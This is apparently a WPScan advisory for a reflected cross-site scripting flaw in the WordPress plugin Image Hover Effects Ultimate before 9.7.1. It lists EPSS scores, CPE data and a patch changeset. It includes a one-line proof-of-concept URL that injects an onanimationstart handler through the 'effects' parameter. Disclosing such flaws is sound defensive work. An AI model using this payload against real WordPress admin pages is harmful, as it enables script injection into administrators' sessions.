Image Hover Effects Ultimate < 9.7.1 - Reflected Cross-Site Scripting

2021-12-2700:00:00

Krzysztof Zając

wpscan.com

0.001 Low

EPSS

Percentile

30.1%

JSON

The plugin does not escape the effects parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting

PoC

https://example.com/wp-admin/admin.php?page=image-hover-ultimate-support&effects;="+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(/XSS/)+p

CPENameOperatorVersion
image-hover-effects-ultimatelt9.7.1

CPE	Name	Operator	Version
	image-hover-effects-ultimate	lt	9.7.1

References

plugins.trac.wordpress.org/changeset/2648086

0.001 Low

EPSS

Percentile

30.1%

JSON

Related for WPVDB-ID:1FBCF5EC-498E-4D40-8577-84B8C7AC3201